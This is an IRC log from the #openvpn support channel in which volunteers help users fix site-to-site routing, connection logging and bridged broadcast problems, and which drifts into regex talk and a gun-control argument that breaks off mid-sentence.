07:39 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 07:46 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 07:46 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 08:14 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds] 08:16 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has joined #openvpn 08:27 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:38 -!- brute11k1 [~brute11k@89.249.235.33] has joined #openvpn 08:39 -!- brute11k [~brute11k@89.249.235.33] has quit [Ping timeout: 265 seconds] 08:49 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn 08:50 -!- brute11k1 [~brute11k@89.249.235.33] has quit [Ping timeout: 260 seconds] 08:59 -!- MarKsaitis_ [~MarKsaiti@81.101.81.114] has joined #openvpn 09:00 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Ping timeout: 255 seconds] 09:01 -!- MarKsaitis_ [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 09:01 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 09:01 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 09:10 <@ecrist> IT: no PMs, please 09:10 <+rob0> oh, sorry, that's partly my fault 09:11 <@ecrist> hrm 09:11 * ecrist goes and reads 09:11 <+rob0> Here's the deal: IT wants to hire someone to do a small and simple VPN job. 09:11 < IT> oh, k :P 09:11 <+rob0> I could have done it, but not through TeamViewer, which is the way he wants to provide access. 09:12 <@ecrist> wtf is TeamViewer? 09:12 -!- abradsha [~Ade@95.209.134.79.bredband.tre.se] has joined #openvpn 09:12 <@ecrist> ah 09:13 <@ecrist> nm, I can google 09:13 <@ecrist> IT, you're forgiven your PM.:) 09:13 < Eagleman> whats bad about teamviewer lol 09:13 <+rob0> If you have TeamViewer you'll be in and out in less than an hour. He just wants a site-to-site VPN which is partly working already. 09:14 <+rob0> well, I'm not saying what's good nor bad about TeamViewer; I don't have it and can't easily install it. But I am a fan of ssh :) 09:15 < Eagleman> I guess he wants to monitor what you are doing 09:15 <+rob0> screen(1) can do that too 09:15 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 248 seconds] 09:18 < IT> !1918 09:18 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi 09:18 <@ecrist> so can watch(8) 09:19 < IT> !8 09:23 <@ecrist> IT, I'd strongly suggest you first switch your IP subnets. If you decide to ever add clients, it'll make your life easier before you entrench yourself in those ranges 09:24 <@ecrist> that's up to you, though. we can still get things working with what you have 09:25 < IT> i changed one to 192.168.1.x a few weeks ago 09:25 < IT> i know it's a little harder to track this way, but it's easyer for the users 09:25 <@ecrist> 99% of all home gateways use either 192.168.0.0/24 or 192.168.1.0/24 as their range 09:26 <@ecrist> which will cause problems if anyone ever connects in from a home network that uses those ranges. 09:26 < IT> the 2 branches are in a closed enviroment, nobody should connect from home 09:27 <+rob0> yep, I mentioned that yesterday also. It CAN be done with those networks, but in the long run (when something WILL need to change), I predict pain. :) 09:27 < IT> one step at a time :P 09:27 <@ecrist> sure 09:27 <@ecrist> what do you have for the server config now? 09:28 <@ecrist> and what do you have for the client config now? 09:28 <@ecrist> also, are the two VPN machines your network gateways already, or are they secondary boxes? 09:28 <+rob0> We got very close yesterday. Seemed like iroute wasn't working. 09:28 < IT> they are my gateways, pasting the config in a sec 09:28 <+rob0> yes, they're both the gateways 09:29 <+rob0> The ccd file was being read, but for some reason iroute was not working. 09:29 < IT> http://pastebin.com/WnX2r34i 09:30 <@ecrist> in your paste, there's a typo, the network ranges on lines 23 and 24 should match 09:31 -!- abradsha is now known as ade_b 09:31 -!- ade_b [~Ade@95.209.134.79.bredband.tre.se] has quit [Changing host] 09:31 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 09:32 < IT> they should contain the local ip or the client's ip? 09:32 <+rob0> 192.168.0.0/24 is the client LAN, 192.168.1.0/24 is the server LAN 09:33 <+rob0> push the server LAN route to the client, set the client LAN route on the server? 09:35 -!- dazo changed the topic of #openvpn to: OpenVPN Community Support Channel || PLEASE read entire topic || OpenVPN RELEASED FOR ANDROID! || Current Release: 2.3.0 (08-Jan-2013) || First time? Use !welcome and !goal || Access-Server? /join #openvpn-as || We're not psychic - please !paste your !configs and !logs and a description of the issue || Your problem is probably your firewall, Really ||Not a native English speaker? say so! 09:36 <@ecrist> IT: they should contain the local subnet for the server 09:36 < IT> ok, changed both to 192.168.1.0 09:37 < IT> the ccd contains iroute 192.168.1.0 255.255.255.0 09:45 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Ping timeout: 246 seconds] 09:50 < IT> @ecrist? 09:53 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 09:54 <@ecrist> sorry, was AFK 09:54 * ecrist reads 09:55 <@ecrist> the iroute is wrong 09:55 <@ecrist> the iroute should be for the route of the client LAN 09:55 < IT> 192.168.0.0 255.255.255.0 then 09:56 < IT> ok, changed 09:57 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn 09:57 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host] 09:57 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 09:57 < IT> i can ping machines in LAN1 from LAN2 gw but not vice-versa 09:58 <@ecrist> IT, can you draw up a diagram, quick? 09:58 <@ecrist> !diagram 09:58 <@vpnHelper> "diagram" is You can use a site such as http://gliffy.com to create a network diagram as well as programs such as Visio, Dia, or OmniGraffle 09:58 < IT> sure 10:05 -!- Eagleman [~Eagleman@D4B2D271.static.ziggozakelijk.nl] has quit [] 10:06 < IT> just a quick drawing http://www.gliffy.com/go/publish/4209220/ tell me if i missed anything important 10:06 <@vpnHelper> Title: Gliffy Public Diagram - network diagram1 (at www.gliffy.com) 10:08 -!- ben1066_ is now known as ben1066 10:09 <@ecrist> perfect 10:09 <@ecrist> which side are you calling LAN1 and LAN2? 10:09 < IT> left LAN1, right LAN2 10:10 <@ecrist> ok 10:11 <@ecrist> is ipforwarding enabled on the client and the server? 10:11 < IT> i believe so, they server as internet gateways 10:12 < IT> *serve 10:13 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Quit: Leaving] 10:14 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 10:15 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Killed (idoru (Spam is off topic on freenode.))] 10:16 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 10:16 < fu_fu> what's up dudes 10:16 < fu_fu> and dudettes 10:17 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 10:17 < fu_fu> I wanted to tell you about a problem I found a solution for today. There is no documentation of it that I can find so far, so I am letting you all know. 10:18 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 10:19 < fu_fu> the log error msg is regarding MULTI: bad source address from client [fe80::d978:2f77:f0f3:3320], packet dropped 10:20 <@ecrist> IT: firewall rules? 10:20 < fu_fu> this is a windows client to windows server, IPv6 issue is easily fixed by removing IPv6 from the TAP adapter 10:20 <@ecrist> also, 10:20 <@ecrist> !logs 10:20 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 10:21 < fu_fu> RTue Jan 08 11:09:37 2013 us=991671 cor-to-EUTS01/174.129.219.194:61210 MULTI: bad source address from client [fe80::d978:2f77:f0f3:3320], packet dropped 10:21 -!- master_of_master [~master_of@p57B55F0A.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 10:22 <@ecrist> the logs was for IT 10:22 < fu_fu> right sorry 10:22 < fu_fu> i'm just stoked i got the err off my screen 10:22 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 10:23 -!- master_of_master [~master_of@p57B53BBC.dip.t-dialin.net] has joined #openvpn 10:23 <+rob0> "Bad source address from client" is in the OpenVPN FAQ, and the answer is iroute. 10:27 < fu_fu> rob0 I think, it is an IPv6 issue with windows the iroute statements are correct but the error still occurs, when i disabled IPv6 on the adapter the error stopped. 10:28 <+rob0> Since IPv6 is only in 2.3, and 2.3 has not yet been released, documentation details might not be complete. 10:28 < fu_fu> pekster ID'd the error as an IPv6 problem in windows I think, several hours ago. I just wanted to close the loop 10:28 < fu_fu> rob0 2.3 is out now :) 10:28 <@ecrist> IT??? 10:29 < IT> pasting 10:29 <@ecrist> rob0: 2.3 was released today 10:29 < IT> got lag on pastebin, 2 sec, check pm 10:29 <@ecrist> see /topic 10:30 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 10:31 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 10:31 < IT> got the rules? 10:31 <+rob0> oh ha. I saw dazo change the /topic but didn't pay attention to it :) 10:32 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 248 seconds] 10:34 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 10:34 <@ecrist> looking 10:34 <@ecrist> rob0: probably good to pay attention to 10:35 <@ecrist> !iptables 10:35 <@vpnHelper> "iptables" is (#1) to test if iptables is your problem, disable all rules or put the defaults to accept: iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -F; iptables -Z or (#2) please see http://openvpn.net/man#lbBD for more info or (#3) you can see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for pf or iptables or (#4) These is just the 10:35 <@vpnHelper> basics to get OpenVPN working. Proper firewall design is beyond the scope of this channel. You can try #iptables 10:35 <@ecrist> IT ^^^ 10:36 -!- b00b [~freenode@46.166.178.155] has joined #openvpn 10:39 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 260 seconds] 10:39 < IT> i don't think it's the firewall, i got the policy on default accept and can't ping from lan1 to lan2 10:40 < IT> i don't think it's the firewall, i got the policy on default accept and can't ping from lan1 to lan2 gw 10:40 < IT> sry for double post 10:42 <@ecrist> so, you can ping from lan2 machines to lan1 machines? 10:42 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 10:43 <@ecrist> can you ping from lan1 machines to lan2 machines? 10:44 < IT> no and no 10:44 < IT> i can ping from lan2 gw to lan1 machines 10:44 < IT> and that's it 10:44 <@ecrist> you still haven't posted your logs 10:45 <@ecrist> also, can you post a traceroute from a lan1 machine to a lan2 machine? 10:45 <@ecrist> and your routing tables from both lan1 gw and lan2 gw 10:47 < IT> here you go http://pastebin.com/fnCL33ua 10:49 -!- kjs [kjs@fedora/kjs] has joined #openvpn 10:50 < kjs> Guys is there any way of seeing a list of when users have authenticated? 10:50 <@ecrist> look at the openvpn status log 10:50 <@ecrist> IT: logs? 10:51 <@ecrist> also, !configs again, please 10:51 < kjs> i am looking in the status log now... 10:51 < IT> ServerA -> http://pastebin.com/XERBh8m9 10:52 < IT> ServerB -> http://pastebin.com/ef7t8veb 10:53 < IT> Configs -> http://pastebin.com/m64DhN0h 10:56 < IT> i have to move to my home workstation :) afk a little 11:00 <@ecrist> kk 11:02 < kjs> hmm 11:02 < kjs> openvpn-status-log only conains connections with todays date ? 11:02 < kjs> does it only log for 1 da y? 11:03 <@ecrist> kjs: openvpn-status-log shows currently connected users 11:03 <@ecrist> !man 11:03 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 11:03 < kjs> i see 11:03 < kjs> so there is no historic log ? 11:03 <@ecrist> look at --log 11:04 <@ecrist> try reading the man page 11:05 <@ecrist> IT: routes aren't getting pushed properly yet, still looking 11:06 <@ecrist> !iroute 11:06 <@vpnHelper> "iroute" is does not bypass or alter the kernel's routing table, it allows openvpn to know it should handle the routing when the kernel points to it but the network is not one that openvpn knows about. This is only needed when connecting a LAN which is behind a client, and therefor belongs in a ccd entry. Also see !route and !ccd 11:06 < kjs> looks like someone has commented it out... 11:06 < kjs> # Log messages to the syslog. 11:06 < kjs> ;log openvpn.log 11:06 < kjs> ;log-append logs/openvpn.log 11:06 <+EugeneKay> !paste 11:06 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website, or (#2) ie: www.pastebin.ca 11:06 < kjs> It was 3 lines... 11:06 <@ecrist> kjs: that someone would be you, or another admin 11:06 < kjs> Not me. 11:07 <@ecrist> so, another admin 11:07 <@ecrist> or gremlins maybe 11:07 <@ecrist> or the nazis 11:08 < kjs> Ex admin ;) 11:09 <@ecrist> IT: you need to add "route 192.168.0.0 255.255.255.0" to your server config 11:10 < kjs> What a bitch, I can't think of another way of finding out if a user has been connecting to the VPN or not.. 11:10 <@ecrist> you have to log the traffic... 11:22 -!- raidz_away is now known as raidz 11:22 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 11:25 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has quit [Quit: Dieser Computer ist eingeschlafen] 11:28 -!- mode/#openvpn [-o plaisthos] by ChanServ 11:28 * plaisthos hides again 11:32 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:32 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:32 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:35 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 276 seconds] 11:41 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 264 seconds] 11:52 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 11:56 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 246 seconds] 11:57 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 12:00 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 12:03 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:15 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 246 seconds] 12:24 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 12:25 -!- `Ile` [~kvirc@212-200-214-138.dynamic.isp.telekom.rs] has quit [Quit: KVIrc 4.1.3 Equilibrium http://www.kvirc.net/] 12:52 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has joined #openvpn 12:55 -!- pa [~pa@unaffiliated/pa] has quit [Read error: Connection reset by peer] 12:58 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 13:01 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 13:08 * EugeneKay sneezes violently 13:08 * ecrist doesn't give a shit 13:08 <+EugeneKay> I need to do that too, now that you mention it. 13:10 <@ecrist> at the office, we refer to it as doing 'paperwork' 13:10 <+EugeneKay> Ah, offices. How quaint. 13:11 <@ecrist> indeed 13:38 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 13:44 -!- n2deep_ [n2deep@odin.sdf-eu.org] has joined #openvpn 13:48 -!- n2deep_ [n2deep@odin.sdf-eu.org] has quit [Client Quit] 13:48 -!- n2deep [n2deep@odin.sdf-eu.org] has quit [Quit: Lost terminal] 13:49 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn 14:23 -!- novaflash [~novaflash@openvpn/user/novaflash] has quit [Changing host] 14:23 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has joined #openvpn 14:23 -!- ServerMode/#openvpn [+v novaflash] by sturgeon.freenode.net 14:23 -!- mode/#openvpn [+o novaflash] by ChanServ 14:31 <+pekster> kjs: I wrote a generic (and of course extensible) on-disconnect accounting script if you want to use it. It's GPLv3 code, so you're free to use it as a starting point for anything else you might need 14:31 <+pekster> !accounting 14:31 <@vpnHelper> "accounting" is http://pekster.sdf.org/code/files/openvpn-user-accounting.tgz for some bash code for basic accounting 14:31 <@ecrist> gah, GPL 14:32 <+pekster> ecrist: Could be worse: I could have used GNU AGPL for that ;) 14:32 <@ecrist> heh 14:32 * ecrist refines regex 14:33 <@ecrist> gah, /[\w]{,1}GPL/ 14:33 <+pekster> I wrote some regex yesterday to remove comments and zero chain counters on iptables-save rules 14:33 <+pekster> sed -r -e '1,1 p' -e '/^#/ d' -e 's/\[[[:digit:]]+:[[:digit:]]+\]/\[0:0\]/' 14:33 <@ecrist> I really hate that particular syntax 14:33 <@ecrist> PCRE FTW 14:34 <+pekster> No perl on my target system ;) 14:34 <@ecrist> the world's not perfect 14:34 <@ecrist> you don't need Perl for PCRE 14:34 <+pekster> How about an ash shell? ;) 14:34 <@ecrist> even grep supports it 14:40 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 17.0.1/20121128204232]] 14:49 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 276 seconds] 14:51 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 14:52 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 15:08 -!- brute11k [~brute11k@89.249.235.33] has quit [Quit: Leaving.] 15:13 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 15:16 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 15:28 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:37 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 15:58 < plaisthos> ecrist: gnu grep but other greps? 16:01 <+pekster> I suppose [0-9]+ is shorter. I dunno, just preference/taste really 16:05 < plaisthos> but probably not the same 16:05 < plaisthos> when localisation and unicode is used 16:09 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 16:13 <+pekster> Well, "digit" is pretty common in most encodings :P 16:15 < plaisthos> pekster: there might be addiotnal numbers like japanese numbers 16:15 <+pekster> Ah, I suppose 16:28 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 16:28 -!- mode/#openvpn [+v s7r] by ChanServ 16:36 -!- widith [~kenneth@li557-200.members.linode.com] has joined #openvpn 16:37 < widith> is it possible to pass 2 configuration files? I have one with all the parameters and the other with keys 16:37 <+s7r> congratulations for the release folks! 16:38 <+s7r> speaking off.. i have a question which stays on my mind. how come openvpn can connect via http proxy? how can you can connect to a ftp website on port 21 via a http proxy? wasn't http proxy just for http traffic? what is happening 16:38 <+s7r> what is the differnece between http proxy and socks4/5 proxy as I recall socks was for all protocols while http proxy was just for browsing http websites and nothing more 16:39 <+s7r> so ? 16:40 <+s7r> widith: why don't you make a single file .. adn that is all. include the certs there like 16:40 <+s7r> etc. 16:40 <+s7r> it is simpler this way 16:40 -!- dazo is now known as dazo_afk 16:43 <+pekster> widith: You can chain 'config' statements together 16:43 <+pekster> I don't see the advantage, but it's available to you as a feature if you want it 16:50 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 265 seconds] 16:57 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 17:01 -!- defswork [~andy@141.0.50.105] has joined #openvpn 17:03 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds] 17:03 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds] 17:05 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 17:07 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 17:15 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 17:15 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 17:18 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 17:23 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 240 seconds] 17:23 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Ping timeout: 265 seconds] 17:27 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 17:36 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 17:36 -!- moore1 [~moore@50.7.199.107] has joined #openvpn 17:58 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 18:10 -!- chrisb [~chrisb@pool-71-175-253-228.phlapa.east.verizon.net] has joined #openvpn 18:14 -!- chrisb [~chrisb@pool-71-175-253-228.phlapa.east.verizon.net] has quit [Ping timeout: 240 seconds] 18:16 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 18:17 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 18:18 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 18:32 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 18:46 -!- ancient3 [~Rockminto@c83-253-113-227.bredband.comhem.se] has joined #openvpn 18:47 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 18:48 < kantlivelong> hey all.. im using an openvpn TAP server with a a remote windows client. for some reason LAN based games do not auto detect sessions. im assuming its using broadcast and am unsure why thats not being replayed? 18:48 -!- troy- [~troy@dcamp-bbr1.prg1.eu.tauri.ca] has quit [Quit: leaving] 18:48 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 18:49 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 18:49 < ancient3> kantlivelong: Bridge mode or ? 18:50 < ancient3> kantlivelong: Allow traffic for Tap interfaces. 18:51 < ancient3> kantlivelong: And bridge interfaces to test it, so that nothing is blocked. 18:51 < kantlivelong> ancient3: its bridged 18:51 < kantlivelong> and traffic is flowing 18:51 < kantlivelong> i can ping/make connections manually 18:52 -!- moore1 [~moore@50.7.199.107] has quit [] 18:54 < ancient3> The windows client needs a port that it cannot rech from the servers TAP/Bridge interfaces. Firewall ? 18:55 < ancient3> Reach 18:56 < ancient3> Once a vpn-client connects you need to think of the interfaces as local interfaces for the client. 18:56 < kantlivelong> yeah 18:58 < ancient3> If you can... open up both the client and server firewalls. Test the game to exclude any of those issues. 19:00 <+pekster> kantlivelong: Using wireshark to capture packets may help. IIRC, IPX routing in Windows is highly broken, and I recall from a few years back failing to get some game auto-detect working because Windows was routing the reply IPX packet out of the physical LAN instead of the VPN where the source IPX broadcast came from :( 19:00 < kantlivelong> ancient3: the game works as expected when specifying the IP of the other node 19:00 <+pekster> So, if you're using IPX, you might just be screwed. I looked up relevant MS docs on IPX routing, and they were wrong (not a huge surprise, but frustrating at least) 19:00 < kantlivelong> its when searching for games on a lan 19:00 < kantlivelong> so might be ipx.. 19:00 < kantlivelong> hmm 19:01 <+pekster> Well, if it's using IPX (most newer games don't and prefer to use a UDP/TCP broadcast) 19:01 <+pekster> That could be a firewall issue, depending on how your LAN systems and routers are configured 19:01 < kantlivelong> well one easy game i tested was minecraft 19:01 < kantlivelong> i see UDP packets on my lan on broadcast 19:01 < kantlivelong> but not on the end client 19:02 <+pekster> A bridged/tap setup will send that across the VPN, so I suspect your firewall is getting in the way 19:02 <+pekster> Follow packets and tcpdump/wireshark at each step 19:02 < kantlivelong> pekster: do i need to add a specific route for broadcast? 19:02 < kantlivelong> firewall is wide open on the tap/bridge 19:02 < ancient3> kantlivelong, pekster: Oooh! IPX, Today! :) Haha, thats funny :) 19:02 < ancient3> IPX/SPX 19:03 <+pekster> Some of us still like playing games from the 90's :( 19:04 <+pekster> Now please excuse me while I turn on my Electric Sheep screensaver ;) 19:04 < kantlivelong> haha 19:04 < ancient3> Well, you live and learn. But odd, because i thought minecraft used TCP/IP 19:04 < kantlivelong> i hate games that require searching instead of just letting me slap in the ip 19:05 < kantlivelong> ancient3: it does im sure for the connection. but not for broadcasting games 19:05 < kantlivelong> though most games use udp 19:05 < kantlivelong> hmm 19:06 < ancient3> kantlivelong: Aha! ... So many games does that (or did)... Its odd why they dont use a central DB to announce connectable games. 19:06 < kantlivelong> ancient3: why would they? most people dont have time to setup servers 19:06 < ancient3> Yeah, but not IPX, thats just evil :) 19:07 -!- Guest15284 [~LaStik@62.109.16.198] has quit [Ping timeout: 240 seconds] 19:07 < ancient3> Yeah, lets use a protocol that noone wants, right ? :) 19:08 <+pekster> IPX would be (have been?) easier to use is Redmond's own documentation was actually correct :( 19:09 < ancient3> I think thats Novells protocol. 19:09 < ancient3> Or was. 19:09 <+pekster> Well, when a Windows game uses it, you're stuck using Redmond's frontends to interact with the OS 19:10 < ancient3> Yep, complete crap is mostly what they provide. As little interaction between operating systems as possible is "Encouraged". 19:11 <+pekster> Unix/Linux seem to mostly "get along" despite their fundamental differences ;) 19:11 < ancient3> I like the EU that way. They said "Make operating systems talk to eachother". This has worked very well if you lok at samba for instance. 19:14 < ancient3> Naah, UNIX/Linux/BSD/Apple is ok. Only windos doesnt want interoperability. 19:18 < ancient3> Apple maintains cups, Oracle maintains MySQL and openoffice nowdays. I think they are doing a good job without knowing a whole lot of the intricates. They provide usable and nice code i think. But i wonder why openoffice (the old staroffice from Germany) is so hard to compile. They need to work on that. 19:19 <+EugeneKay> Oracle dropped OpenOffice; it's a stalled Apache project now 19:19 <+EugeneKay> All of the core developers left and formed The Document Foundation, which produces LibreOffice 19:19 < ancient3> EugeneKay: Aha!, yeah i saw that and im using Libre office nowdays :) 19:20 <+EugeneKay> The same thing is happening with MySQL --> MariaDB. Percona is a notable fork, but it's for-profit. 19:28 < ancient3> Yes, they are generally forked to provide extra functions to paying customers. I have thought about that too, To make a standard thing and then allowing payments for it so customers will for instance get database support within the GUI's that im making. But im more interrested in working for a company or so that i use my code for my CV and let it loose across the worlds :) 19:30 < ancient3> I assume Percona is maintained by Spanish people... This will probably be a much better version because they seem to be highly unemployed at the moment. 19:33 < ancient3> Im in Sweden and i have been unemployed for 4 years in a few months. People who shouldnt have jobs in IT have them. Thats very odd, because i thought that skills had anything todo with working. 19:33 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 19:34 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Ping timeout: 265 seconds] 19:35 < ancient3> It was the same shit in 1998-2002 ... Seems idits get to work that needs to realize they hate their jobs and do not work in IT anymore. Or so they try to tell people. 19:35 <+pekster> There are still companies out there that value actual skill 19:36 <+pekster> The better ones even respect the public/private IP issues too 19:36 < ancient3> pekster: I sure hope so :) 19:36 <+pekster> ancient3: You might enjoy a talk at 29C3 (torrents and mirrors available) called 'Securing the Campaign' where the head of security for the Obama 2012 campaign talks about IT security 19:38 < Suterusu> Anyone bored enough to help diagnose why I keep gitten D/c'd form my VPN? 19:40 < ancient3> pekster: I actually think Obama is doing much good. Especially if he removes guns from the streets as he has done. Because with all the shootings over there i feel the NRA needs to realize what the hell they are doing to their own people. 19:41 < Suterusu> They allowed to carry guns for a reason 19:41 < Suterusu> protection 19:42 -!- LaStik [~LaStik@62.109.16.198] has joined #openvpn 19:42 < Suterusu> Not from each other, the muggers an burglars etc - Thats a bonus - Its protection from tyrannical rule 19:42 <+pekster> A lot of the problem is social too; Canada has more guns per person and far less deaths. Plus we seem to care more as a country about our 2nd admendemnt (right to guns) than our 4th (right to privacy and protection from unwarrented searches) 19:42 -!- LaStik is now known as Guest55454 19:42 <+pekster> Suterusu: Don't ask to ask, just ask. We're talking about other stuff because no one has asked about VPNs in a while ;) 19:42 < Suterusu> If needed, the country could rise at arms to enforce a new leader 19:42 <+pekster> True, but I don't think we're in danger of being invaded by England. Not for a while anyway :P 19:43 < Suterusu> Who 'asked to ask'? I said my piece - Peeps interested or they int 19:43 < Suterusu> lol, more likey china 19:43 < Suterusu> Esp once they figgure owt you aint got they gold 19:44 < ancient3> Suterusu: Yes, its an evil and downwards pointing spiral that will lead to more guns. But what if there where stricter checks on whom could get and or carry a gun. Now i know you dont want Psychopaths to have guns for example (I wouldnt). 19:45 < Suterusu> Police can carry 'em, I want better - They've proved to me (generally) they can't be trusted.... 19:46 < Suterusu> 'tis 'Gun-free' here in England - But that didn't stop me gettin several as a teen - Every other farmer got at least one shotgun, too 19:47 < Suterusu> Accord to FBI, Over in states, More people die from clubs, bats and hammers than rifles, per yr, Consistently - 'tis hardly an award winning argument "less guns = less gun crime" 19:51 -!- raidz is now known as raidz_away 19:54 < ancient3> Suterusu: But i bet more people can be killed with automatic fire. Especially children for instance ? 19:56 < ancient3> Suterusu: Or do you defend children getting killed at schools so much that you want no change in gunlaws at all ? 19:56 < Suterusu> true - as prev. saids, tho - I phear more to gain not from taking away the assault rifle, but to acrue a state of mind where 